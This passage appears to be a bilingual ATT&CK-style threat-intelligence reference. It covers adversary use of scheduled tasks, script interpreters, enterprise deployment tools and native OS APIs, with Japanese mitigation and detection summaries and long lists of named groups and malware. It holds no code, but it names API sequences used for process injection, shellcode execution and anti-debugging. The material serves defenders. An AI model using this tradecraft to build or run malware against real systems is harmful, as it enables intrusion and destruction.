Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system. 敵対者は、atコマンドを悪用してタスクをスケジュール実行することがある。Adversaries may abuse the at utility to perform task scheduling for initial or recurring execution of malicious code. The at utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of Scheduled Task's schtasks in Windows environments, using at requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with at by directly leveraging the Windows Management Instrumentation `Win32_ScheduledJob` WMI class. 敵対者は、cronを悪用してタスクを定期実行し永続化することがある。Adversaries may abuse the <code>cron</code> utility to perform task scheduling for initial or recurring execution of malicious code. The <code>cron</code> utility is a time-based job scheduler for Unix-like operating systems. The <code> crontab</code> file contains the schedule of cron entries to be run and the specified times for execution. Any <code>crontab</code> files are stored in operating system-specific file paths. 敵対者は、Windowsのスケジュールされたタスクを悪用して実行・永続化することがある。Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The schtasks utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library and Windows Management Instrumentation (WMI) to create a scheduled task. Adversaries may also utilize the Powershell Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to create a scheduled task via an XML path. 敵対者は、systemdタイマーを悪用してタスクを定期実行し永続化することがある。Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to Cron in Linux environments. Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over SSH. 敵対者は、コンテナオーケストレーションのジョブ機能を悪用してタスクを実行・永続化することがある。Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster. アカウントの作成・権限・ライフサイクルを適切に管理する。 ファイルやディレクトリの権限を最小化し、不正な改変を防ぐ。 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 OSを安全に構成し、攻撃対象領域を縮小する。 システムやアカウントを監査し、不正な活動を検出する。 スケジュールされたタスク/ジョブに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During the 2025 Poland Wiper Attacks, the adversaries set FortiGate scheduled tasks to run the adversary generated CLI scripts weekly. Lokibot's second stage DLL has set a timer using “timeSetEvent” to schedule its next execution. 敵対者は、コマンドやスクリプトのインタプリタ（PowerShell・Bash等）を悪用してコードを実行することがある。 Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell. 敵対者は、PowerShellを悪用してコマンドやスクリプトを実行することがある。Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the <code>Start-Process</code> cmdlet which can be used to run an executable and the <code>Invoke-Command</code> cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems). 敵対者は、AppleScriptを悪用してmacOS上でコマンドを実行することがある。Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents. These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely. 敵対者は、Windowsコマンドシェル(cmd)を悪用してコマンドを実行することがある。Adversaries may abuse the Windows command shell for execution. The Windows command shell (cmd) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via Remote Services such as SSH. 敵対者は、Unixシェル(bash等)を悪用してコマンドを実行することがある。Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux, macOS, and ESXi systems, though many variations of the Unix shell exist (e.g. sh, ash, bash, zsh, etc.) depending on the specific OS or distribution. Unix shells can control every aspect of a system, with certain commands requiring elevated privileges. 敵対者は、Visual Basic(VBA/VBScript)を悪用してコードを実行することがある。Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as Component Object Model and the Native API through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core. 敵対者は、Pythonを悪用してコードを実行することがある。Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the <code>python.exe</code> interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables. 敵対者は、JavaScriptを悪用してコードを実行することがある。Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser. 敵対者は、ネットワーク機器のCLIを悪用してコマンドを実行することがある。Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands. 敵対者は、クラウドAPIを悪用してコマンドや操作を実行することがある。Adversaries may abuse cloud APIs to execute malicious commands. APIs available in cloud environments provide various functionalities and are a feature-rich method for programmatic access to nearly all aspects of a tenant. These APIs may be utilized through various methods such as command line interpreters (CLIs), in-browser Cloud Shells, PowerShell modules like Azure for PowerShell, or software developer kits (SDKs) available for languages such as Python. 敵対者は、AutoHotKey/AutoITを悪用してコードを実行することがある。Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs. 敵対者は、Luaスクリプトを悪用してコードを実行することがある。Adversaries may abuse Lua commands and scripts for execution. Lua is a cross-platform scripting and programming language primarily designed for embedded use in applications. Lua can be executed on the command-line (through the stand-alone lua interpreter), via scripts (<code>.lua</code>), or from Lua-embedded programs (through the <code>struct lua_State</code>). 敵対者は、ハイパーバイザのCLIを悪用してコマンドを実行することがある。Adversaries may abuse hypervisor command line interpreters (CLIs) to execute malicious commands. Hypervisor CLIs typically enable a wide variety of functionality for managing both the hypervisor itself and the guest virtual machines it hosts. 敵対者は、コンテナのCLI/APIを悪用してコマンドを実行することがある。Adversaries may abuse built-in CLI tools or API calls to execute malicious commands in containerized environments. 危険なWebコンテンツへのアクセスを制限する。 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 ソフトウェアのインストールを制限し、不正なプログラム導入を防ぐ。 許可されていないコードの実行を防止する。 エンドポイントで悪意ある挙動を検出・防止する。 不要な機能やプログラムを無効化・削除し、攻撃対象領域を縮小する。 コード署名を検証し、未署名・不正なコードの実行を防ぐ。 システムやアカウントを監査し、不正な活動を検出する。 アンチウイルス/アンチマルウェアで悪意あるコードを検出・防止する。 コマンド＆スクリプトインタプリタに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 For Operation Spalax, the threat actors used Nullsoft Scriptable Install System (NSIS) scripts to install malware. During Cutting Edge, threat actors used Perl scripts to enable the deployment of the THINSPOOL shell script dropper and for enumerating host data. ArcaneDoor included the adversary executing command line interface (CLI) commands. FLORAHOX Activity has executed PHP and Shell scripts to identify and infect subsequent routers for the ORB network. Malware used by Ke3chang can run commands on the command-line interface. Dragonfly has used the command line for execution. FIN6 has used scripting to iterate through a list of compromised PoS systems, copy data to a log file, and remove the original data files. Stealth Falcon malware uses WMI to script data collection and command execution on the victim. FIN7 used SQL scripts to help perform tasks on the victim's machine. OilRig has used various types of scripting for execution. APT32 has used COM scriptlets to download Cobalt Strike beacons. FIN5 scans processes on all victim systems in the environment and uses automated scripts to pull back the results. APT37 has used Ruby scripts to execute payloads. APT19 downloaded and launched code within a SCT file. APT39 has utilized custom scripts to perform internal reconnaissance. Whitefly has used a simple remote shell tool that will call back to the C2 server and wait for commands. Fox Kitten has used a Perl reverse shell to communicate with C2. Windigo has used a Perl script for information gathering. Mustang Panda has utilized meterpreter shellcode. Saint Bear has used the Windows Script Host (wscript) to execute intermediate files written to victim machines. Winter Vivern used XLM 4.0 macros for initial code execution for malicious document files. CHOPSTICK is capable of performing remote command execution. gh0st RAT is able to open a remote shell to execute commands. Matryoshka is capable of providing Meterpreter shell access. WINERACK can create a reverse shell that utilizes statically-linked Wine cmd.exe code to emulate Windows command prompt commands. Bandook can support commands to execute Java-based payloads. Zeus Panda can launch remote scripts on the victim’s machine. DarkComet can execute various types of scripts on the victim’s machine. Empire uses a command-line interface to interact with systems. SpeakUp uses Perl scripts. Imminent Monitor has a CommandPromptPacket and ScriptPacket module(s) for creating a remote shell and executing scripts. Get2 has the ability to run executables with command-line arguments. Bonadan can create bind and reverse shells on the infected system. Kessel can create a reverse shell between the infected host and a specified system. P.A.S. Webshell has the ability to create reverse shells with Perl scripts. FIVEHANDS can receive a command line argument to limit file encryption to specified directories. Donut can generate shellcode outputs that execute via Ruby. SLIGHTPULSE contains functionality to execute arbitrary commands passed to it. Raspberry Robin variants can be delivered via highly obfuscated Windows Script Files (WSF) for initial execution. ZeroCleare can receive command line arguments from an operator to corrupt the file system using the RawDisk driver. VersaMem was delivered as a Java Archive (JAR) that runs by attaching itself to the Apache Tomcat Java servlet and web server. NICECURL has provided an arbitrary command execution interface. StarProxy has used the command line for execution of commands. MuddyViper has launched a reverse shell using a provided command line. 敵対者は、企業内の集中型ソフトウェア展開ツールを悪用してコードを実行し横展開することがある。 Adversaries may gain access to and use centralized software suites installed within an enterprise to execute commands and move laterally through the network. Configuration management and software deployment applications may be used in an enterprise network or cloud environment for routine administration purposes. These systems may also be integrated into CI/CD pipelines. Examples of such solutions include: SCCM, HBSS, Altiris, AWS Systems Manager, Microsoft Intune, Azure Arc, and GCP Deployment Manager. Active Directoryを適切に構成し、攻撃対象領域を縮小する。 ユーザーにソーシャルエンジニアリングや不審な操作への注意を教育する。 アカウントの作成・権限・ライフサイクルを適切に管理する。 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 強固なパスワードポリシーを適用し、推測・解読を困難にする。 重要データをリモートに保管し、破壊・改ざんの影響を軽減する。 ネットワークを分割し、横展開や影響範囲を限定する。 多要素認証を導入し、認証情報の窃取による不正アクセスを防ぐ。 ソフトウェアのインストールを制限し、不正なプログラム導入を防ぐ。 ソフトウェアを最新に保ち、既知の脆弱性を修正する。 ソフトウェア展開ツールに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During C0018, the threat actors used PDQ Deploy to move AvosLocker and tools across the network. Threat Group-1314 actors used a victim's endpoint management platform, Altiris, for lateral movement. Sandworm Team has used the commercially available tool RemoteExec for agentless remote code execution. APT32 compromised McAfee ePO to move laterally by distributing malware as a software deployment task. Silence has used RAdmin, a remote software tool used to remotely control workstations and ATMs. Mustang Panda has leveraged legitimate software tools such as AntiVirus Agents, Security Services, and App Development tools to execute scripts and to side-load dlls. Medusa Group has utilized software deployment and management solutions to deploy their encryption payload to include BigFix and PDQ Deploy. VOID MANTICORE has leveraged legitimate built-in features of cloud-based management platforms to include mobile device management (MDM) and Remote Monitoring and Management (RMM) solutions. VOID MANTICORE has also initiated built-in remote wipe instructions using a privileged account within Microsoft Intune. It is believed that a patch management system for an anti-virus product commonly installed among targeted companies was used to distribute the Wiper malware. 敵対者は、OSのネイティブAPIを直接呼び出して悪意ある処理を実行することがある。 Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes. These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations. 許可されていないコードの実行を防止する。 エンドポイントで悪意ある挙動を検出・防止する。 ネイティブAPIに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Operation Honeybee, the threat actors deployed malware that used API calls, including `CreateProcessAsUser`. During Operation Sharpshooter, the first stage downloader resolved various Windows libraries and APIs, including `LoadLibraryA()`, `GetProcAddress()`, and `CreateProcessA()`. During Operation Wocao, threat actors used the `CreateProcessA` and `ShellExecute` API functions to launch commands after being injected into a selected process. During Operation Dream Job, Lazarus Group used Windows API `ObtainUserAgentString` to obtain the victim's User-Agent and used the value to connect to their C2 server. During Operation Digital Eye, threat actors used native API such as `GetUserInfo`. Turla and its RPC backdoors have used APIs calls for various tasks related to subverting AMSI and accessing then executing commands through RPC and/or named pipes. Lazarus Group has used the Windows API <code>ObtainUserAgentString</code> to obtain the User-Agent from a compromised host to connect to a C2 server. Lazarus Group has also used various, often lesser known, functions to perform various types of Discovery and Process Injection. Sandworm Team uses Prestige to disable and restore file system redirection by using the following functions: `Wow64DisableWow64FsRedirection()` and `Wow64RevertWow64FsRedirection()`. menuPass has used native APIs including <code>GetModuleFileName</code>, <code>lstrcat</code>, <code>CreateFile</code>, and <code>ReadFile</code>. Gamaredon Group malware has used <code>CreateProcess</code> to launch additional malicious components. APT37 leverages the Windows API calls: VirtualAlloc(), WriteProcessMemory(), and CreateRemoteThread() for process injection. Gorgon Group malware can leverage the Windows API call, CreateProcessA(), for execution. Tropic Trooper has used multiple Windows APIs including HttpInitialize, HttpCreateHttpHandle, and HttpAddUrl. APT38 has used the Windows API to execute code within a victim's system. WIRTE has used the `RtlIpv4StringToAddressA` to convert IP-formatted string to a byte array. Silence has leveraged the Windows API, including using CreateProcess() or ShellExecute(), to perform a variety of tasks. TA505 has deployed payloads that use Windows API calls on a compromised host. Kimsuky has utilized Native APIs to collect data from victim hosts and facilitate execution of malicious scripts. BlackTech has used built-in API functions. Chimera has used direct Windows system calls by leveraging Dumpert. Higaisa has called various native OS APIs. Mustang Panda has used various Windows API calls during execution and defense evasion. SideCopy has executed malware by calling the API function `CreateProcessW`. ToddyCat has used `WinExec` to execute commands received from C2 on compromised hosts. Medusa Group has leveraged Windows Native API functions to execute payloads. Taidoor has the ability to use native APIs for execution including <code>GetProcessHeap</code>, <code>GetProcAddress</code>, and <code>LoadLibrary</code>. PlugX can use the Windows API functions `GetProcAddress`, `LoadLibrary`, and `CreateProcess` to execute another process. Uroburos can use native Windows APIs including `GetHostByName`. gh0st RAT has used the `InterlockedExchange`, `SeShutdownPrivilege`, and `ExitWindowsEx` Windows API functions. ADVSTORESHELL is capable of starting a process using CreateProcess. Misdat has used Windows APIs, including `ExitWindowsEx` and `GetKeyboardType`. Mis-Type has used Windows API calls, including `NetUserAdd` and `NetUserDel`. S-Type has used Windows APIs, including `GetKeyboardType`, `NetUserAdd`, and `NetUserDel`. ComRAT can load a PE file from memory or the file system and execute it with <code>CreateProcessW</code>. BADNEWS has a command to download an .exe and execute it via CreateProcess API. It can also run with ShellExecute. Winnti for Windows can use Native API to create a new process and to start services. Pteranodon has used various API calls. RTM can use the <code>FindNextUrlCacheEntryA</code> and <code>FindFirstUrlCacheEntryA</code> functions to search for specific strings within browser history. Cobalt Strike's Beacon payload is capable of running shell commands without <code>cmd.exe</code> and PowerShell commands without <code>powershell.exe</code> Cobalt Strike can also use `CreateThreadpoolWait`, `SetThreadpoolWait`, and `MessageBoxA` for sandbox evasion and execution of embedded payloads in memory. XAgentOSX contains the execFile function to execute a specified file on the system using the NSTask:launch method. Volgmer executes payloads using the Windows API call CreateProcessW(). NETWIRE can use Native API including <code>CreateProcess</code> <code>GetProcessById</code>, and <code>WriteProcessMemory</code>. Bandook has used the ShellExecuteW() function call. Bankshot creates processes using the Windows API calls: CreateProcessA() and CreateProcessAsUserA(). ROKRAT can use a variety of API calls to execute shellcode. SynAck parses the export tables of system DLLs to locate and call various Windows API functions. Mosquito leverages the CreateProcess() and LoadLibrary() calls to execute files with the .dll and .exe extensions. InnaputRAT uses the API call ShellExecuteW for execution. InvisiMole can use winapiexec tool for indirect execution of <code>ShellExecuteW</code> and <code>CreateProcessA</code>. TrickBot uses the Windows API call, CreateProcessW(), to manage execution flow. TrickBot has also used <code>Nt*</code> API functions to perform Process Injection. Bisonal has used the Windows API to communicate with the Service Control Manager to execute a thread. Denis used the <code>IsDebuggerPresent</code>, <code>OutputDebugString</code>, and <code>SetLastError</code> APIs to avoid debugging. Denis used <code>GetProcAddress</code> and <code>LoadLibrary</code> to dynamically resolve APIs. Denis also used the <code>Wow64SetThreadContext</code> API as part of a process hollowing process. KONNI has hardcoded API calls within its functions to use on the victim's machine. Empire contains a variety of enumeration modules that have an option to use API calls to carry out tasks. Emotet has used `CreateProcess` to create a new process to run its executable and `WNetEnumResourceW` to enumerate non-hidden shares. Dridex has used the <code>OutputDebugStringW</code> function to avoid malware analysis as part of its anti-debugging technique. njRAT has used the ShellExecute() function within a script. Ursnif has used <code>CreateProcessW</code> to create child processes. HAWKBALL has leveraged several Windows API calls to create processes, gather disk information, and detect debugger activity. LightNeuron is capable of starting a process using CreateProcess. EvilBunny has used various API calls as part of its checks to see if the malware is running in a sandbox. HyperBro has the ability to run an application (<code>CreateProcessW</code>) or script/file (<code>ShellExecuteW</code>) via API. ZxShell can leverage native API including <code>RegisterServiceCtrlHandler </code> to register a service.RegisterServiceCtrlHandler RDFSNIFFER has used several Win32 API functions to interact with the victim machine. HotCroissant can perform dynamic DLL importing and API lookups using <code>LoadLibrary</code> and <code>GetProcAddress</code> on obfuscated strings. Imminent Monitor has leveraged CreateProcessW() call to execute the debugger. PLEAD can use `ShellExecute` to execute applications. Attor's dispatcher has used CreateProcessW API for execution. ShimRat has used Windows API functions to install the service and shim. ShimRatReporter used several Windows API functions to gather information from the infected system. Ryuk has used multiple native APIs including <code>ShellExecuteW</code> to run executables,<code>GetWindowsDirectoryW</code> to create folders, and <code>VirtualAlloc</code>, <code>WriteProcessMemory</code>, and <code>CreateRemoteThread</code> for process injection. Lokibot has used LoadLibrary(), GetProcAddress() and CreateRemoteThread() API functions to execute its shellcode. Rising Sun used dynamic API resolutions to various Windows APIs by leveraging `LoadLibrary()` and `GetProcAddress()`. Maze has used several Windows API functions throughout the encryption process including IsDebuggerPresent, TerminateProcess, Process32FirstW, among others. Pony has used several Windows functions for various purposes. Metamorfo has used native WINAPI calls. Aria-body has the ability to launch files using <code>ShellExecute</code>. Netwalker can use Windows API functions to inject the ransomware DLL. Ramsay can use Windows API functions such as <code>WriteFile</code>, <code>CloseHandle</code>, and <code>GetCurrentHwProfile</code> during its collection and file storage operations. Ramsay can execute its embedded components via <code>CreateProcessA</code> and <code>ShellExecute</code>. WindTail can invoke Apple APIs <code>contentsOfDirectoryAtPath</code>, <code>pathExtension</code>, and (string) <code>compare</code>. BBK has the ability to use the <code>CreatePipe</code> API to add a sub-process for execution via cmd. build_downer has the ability to use the <code>WinExec</code> API to execute malware on a compromised host. BackConfig can leverage API functions such as <code>ShellExecuteA</code> and <code>HttpOpenRequestA</code> in the process of downloading and executing files. Goopy has the ability to enumerate the infected system's user name via <code>GetUserNameW</code>. IcedID has called <code>ZwWriteVirtualMemory</code>, <code>ZwProtectVirtualMemory</code>, <code>ZwQueueApcThread</code>, and <code>NtResumeThread</code> to inject itself into a remote process. Carberp has used the NtQueryDirectoryFile and ZwQueryDirectoryFile functions to hide files and directories. GoldenSpy can execute remote commands in the Windows command shell using the <code>WinExec()</code> API. REvil can use Native API for execution and to retrieve active services. Hancitor has used <code>CallWindowProc</code> and <code>EnumResourceTypesA</code> to interpret and execute shellcode. PipeMon's first stage has been executed by a call to <code>CreateProcess</code> with the decryption password in an argument. PipeMon has used a call to <code>LoadLibrary</code> to load its installer. FatDuke can call <code>ShellExecuteW</code> to open the default browser on the URL localhost. Pillowmint has used multiple native Windows APIs to execute and conduct process injections. PolyglotDuke can use <code>LoadLibraryW</code> and <code>CreateProcess</code> to load and execute code. BloodHound can use .NET API calls in the SharpHound ingestor component to pull Active Directory data. Grandoreiro can execute through the <code>WinExec</code> API. Bazar can use various APIs to allocate memory and facilitate code execution/injection. HyperStack can use Windows API's <code>ConnectNamedPipe</code> and <code>WNetAddConnection2</code> to detect incoming connections and connect to remote shares. Egregor has used the Windows API to make detection more difficult. GuLoader can use a number of different APIs for discovery and execution. SUNSPOT used Windows API functions such as <code>MoveFileEx</code> and <code>NtQueryInformationProcess</code> as part of the SUNBURST injection process. Explosive has a function to call the OpenClipboard wrapper. BitPaymer has used dynamic API resolution to avoid identifiable strings within the binary, including <code>RegEnumKeyW</code>. BendyBear can load and execute modules and Windows Application Programming (API) calls using standard shellcode API hashing. Conti has used API calls during execution. After escalating privileges, MegaCortex calls <code>TerminateProcess()</code>, <code>CreateRemoteThread</code>, and other Win32 APIs. Waterbear can leverage API functions for execution. ThiefQuest uses various API to perform behaviors such as executing payloads and performing local enumeration. Stuxnet uses the SetSecurityDescriptorDacl API to reduce object integrity levels. Bad Rabbit has used various Windows API calls. KillDisk has called the Windows API to retrieve the hard disk handle and shut down the machine. SideTwist can use <code>GetUserNameW</code>, <code>GetComputerNameW</code>, and <code>GetComputerNameExW</code> to gather information. Clop has used built-in API functions such as WNetOpenEnumW(), WNetEnumResourceW(), WNetCloseEnum(), GetProcAddress(), and VirtualAlloc(). WastedLocker's custom crypter, CryptOne, leveraged the VirtualAlloc() API function to help execute the payload. CostaBricks has used a number of API calls, including `VirtualAlloc`, `VirtualFree`, `LoadLibraryA`, `GetProcAddress`, and `ExitProcess`. SombRAT has the ability to respawn itself using <code>ShellExecuteW</code> and <code>CreateProcessW</code>. AppleSeed has the ability to use multiple dynamically resolved API calls. Siloscape makes various native API calls. Cuba has used several built-in API functions for discovery like GetIpNetTable and NetShareEnum. SodaMaster can use <code>RegOpenKeyW</code> to access the Registry. The file collection tool used by RainyDay can utilize native API including <code>ReadDirectoryChangeW</code> for folder monitoring. Nebulae has the ability to use <code>CreateProcess</code> to execute a process. Chaes used the <code>CreateFileW()</code> API function with read permissions to access downloaded payloads. GrimAgent can use Native API including <code>GetProcAddress</code> and <code>ShellExecuteW</code>. Babuk can use multiple Windows API calls for actions on compromised hosts including discovery and execution. Avaddon has used the Windows Crypto API to generate an AES key. QakBot can use <code>GetProcAddress</code> to help delete malicious strings from memory. BoxCaon has used Windows API calls to obtain information about the compromised host. MarkiRAT can run the ShellExecuteW API via the Windows Command Shell. xCaon has leveraged native OS function calls to retrieve victim's network adapter's information using GetAdapterInfo() API. Diavol has used several API calls like `GetLogicalDriveStrings`, `SleepEx`, `SystemParametersInfoAPI`, `CryptEncrypt`, and others to execute parts of its attack. FoggyWeb's loader can use API functions to load the FoggyWeb backdoor into the same Application Domain within which the legitimate AD FS managed code is executed. RCSession can use WinSock API for communication including <code>WSASend</code> and <code>WSARecv</code>. SysUpdate can call the `GetNetworkParams` API as part of its C2 establishment process. Gelsemium has the ability to use various Windows API functions to perform tasks. Chrommme can use Windows API including `WinExec` for execution. TinyTurla has used `WinHTTP`, `CreateProcess`, and other APIs for C2 communications and other functions. KOCTOPUS can use the `LoadResource` and `CreateProcessW` APIs for execution. WarzoneRAT can use a variety of API calls on a compromised host. Torisma has used various Windows API calls. LitePower can use various API calls. Lizar has used various Windows API functions on a victim's machine. Cyclops Blink can use various Linux API functions including those for execution and discovery. Meteor can use `WinAPI` to remove a victim machine from an Active Directory domain. WhisperGate has used the `ExitWindowsEx` to flush file buffers to disk and stop running processes and other API calls. SILENTTRINITY has the ability to leverage API including `GetProcAddress` and `LoadLibrary`. CaddyWiper has the ability to dynamically resolve and use APIs, including `SeTakeOwnershipPrivilege`. DRATzarus can use various API calls to see if it is running in a sandbox. Donut code modules use various API functions to load and inject code. Flagpro can use Native API to enable obfuscation including `GetLastError` and `GetTickCount`. HermeticWiper can call multiple Windows API functions used for privilege escalation, service execution, and to overwrite random bites of data. HermeticWizard can connect to remote shares using `WNetAddConnection2W`. ZxxZ has used API functions such as `Process32First`, `Process32Next`, and `ShellExecuteA`. Milan can use the API `DnsQuery_A` for DNS resolution. MacMa has used macOS API functions to perform tasks. Saint Bot has used different API calls, including `GetProcAddress`, `VirtualAllocEx`, `WriteProcessMemory`, `CreateProcessA`, and `SetThreadContext`. Kevin can use the `ShowWindow` API to avoid detection. Amadey has used a variety of Windows API calls, including `GetComputerNameA`, `GetUserNameA`, and `CreateProcessA`. DCSrv has used various Windows API functions, including `DeviceIoControl`, as part of its encryption process. StrifeWater can use a variety of APIs for execution. Bumblebee can use multiple Native APIs. FunnyDream can use Native API for defense evasion, discovery, and collection. PcShare has used a variety of Windows API functions. DEADEYE can execute the `GetComputerNameA` and `GetComputerNameExA` WinAPI functions. AvosLocker has used a variety of Windows API calls, including `NtCurrentPeb` and `GetLogicalDrives`. Prestige has used the `Wow64DisableWow64FsRedirection()` and `Wow64RevertWow64FsRedirection()` functions to disable and restore file system redirection. metaMain can execute an operator-provided Windows command by leveraging functions such as `WinExec`, `WriteFile`, and `ReadFile`. Mafalda can use a variety of API calls. Brute Ratel C4 can call multiple Windows APIs for execution, to share memory, and defense evasion. SVCReady can use Windows API calls to gather information from an infected host. Woody RAT can use multiple native APIs, including `WriteProcessMemory`, `CreateProcess`, and `CreateRemoteThread` for process injection. DarkTortilla can use a variety of API calls for persistence and defense evasion. Black Basta has the ability to use native APIs for numerous functions including discovery and defense evasion. Royal can use multiple APIs for discovery, communication, and execution. QUIETCANARY can call `System.Net.HttpWebRequest` to identify the default proxy configured on the victim computer. When executing with non-root permissions, RotaJakiro uses the the `shmget` API to create shared memory between other known RotaJakiro processes. RotaJakiro also uses the `execvp` API to help its dead process "resurrect". BADHATCH can utilize Native API functions such as, `ToolHelp32` and `Rt1AdjustPrivilege` to enable `SeDebugPrivilege` on a compromised machine. Sardonic has the ability to call Win32 API functions to determine if `powershell.exe` is running. AsyncRAT has the ability to use OS APIs including `CheckRemoteDebuggerPresent`. SharpDisco can leverage Native APIs through plugins including `GetLogicalDrives`. NightClub can use multiple native APIs including `GetKeyState`, `GetForegroundWindow`, `GetWindowThreadProcessId`, and `GetKeyboardLayout`. Samurai has the ability to call Windows APIs. The Ninja loader can call Windows APIs for discovery, process injection, and payload decryption. DarkGate uses the native Windows API <code>CallWindowProc()</code> to decode and launch encoded shellcode payloads during execution. DarkGate can call kernel mode functions directly to hide the use of process hollowing methods during execution. DarkGate has also used the `CreateToolhelp32Snapshot`, `GetFileAttributesA` and `CreateProcessA` functions to obtain a list of running processes, to check for security products and to execute its malware. Mispadu has used a variety of Windows API calls, including ShellExecute and WriteProcessMemory. Akira executes native Windows functions such as <code>GetFileAttributesW</code> and `GetSystemInfo`. INC Ransomware can use the API `DeviceIoControl` to resize the allocated space for and cause the deletion of volume shadow copy snapshots. Pikabot uses native Windows APIs to determine if the process is being debugged and analyzed, such as `CheckRemoteDebuggerPresent`, `NtQueryInformationProcess`, `ProcessDebugPort`, and `ProcessDebugFlags`. Other Pikabot variants populate a global list of Windows API addresses from the `NTDLL` and `KERNEL32` libraries, and references these items instead of calling the API items to obfuscate execution. CHIMNEYSWEEP can use Windows APIs including `LoadLibrary` and `GetProcAddress`. ZeroCleare can call the `GetSystemDirectoryW` API to locate the system directory. IMAPLoader imports native Windows APIs such as `GetConsoleWindow` and `ShowWindow`. Latrodectus has used multiple Windows API post exploitation including `GetAdaptersInfo`, `CreateToolhelp32Snapshot`, and `CreateProcessW`. Mango has the ability to use Native APIs. ODAgent can pass commands using native APIs. OilBooster has used the `ShowWindow` and `CreateProcessW` APIs. Exbyte calls `ShellExecuteW` with the `IpOperation` parameter `RunAs` to launch `explorer.exe` with elevated privileges. BlackByte Ransomware uses the `SetThreadExecutionState` API to prevent the victim system from entering sleep. Kapeka utilizes WinAPI calls to gather victim system information. StealBit can use native APIs including `LoadLibraryExA` for execution and `NtSetInformationProcess` for defense evasion purposes. LockBit 3.0 has the ability to directly call native Windows API items during execution. XLoader uses the native Windows API for functionality, including defense evasion. Sagerunex calls the `WaitForSingleObject` API function as part of time-check logic. BOOKWORM has used various Windows API calls during execution and defense evasion. BOOKWORM has created a buffer on the heap using `HeapCreate` and `HeapAlloc` which allows for copying of shell code and then execution on the heap is initiated through callback function of legitimate API functions such as `EnumChildWindows` or `EnumSystemLanguageGroupsA`. StarProxy has used native windows API calls such as `GetLocalTime()` to retrieve system data. PUBLOAD has used various Windows API calls during execution, when establishing persistence and defense evasion. PUBLOAD stager leveraged Windows API functions with callback including `GrayStringW`, `EnumDateFormatsA`, and `LineDDA` to bypass anti-virus monitoring. PUBLOAD has also utilized other native windows API functions with callback functions such as `EnumChildWindows` and `EnumSystemLanguageGroupsA`. Havoc can use `NtAllocateVirtualMemory` and `NtCreateThreadEx` to aid process injection. SplatDropper has utilized hashed Native Windows API calls. PAKLOG has used Windows API `SetWindowsHookExW` with `idHook` set to `WH_KEYBOARD_LL` and a custom hook procedure to support its keylogging functions. SplatCloak has utilized Native Windows API calls dynamically through 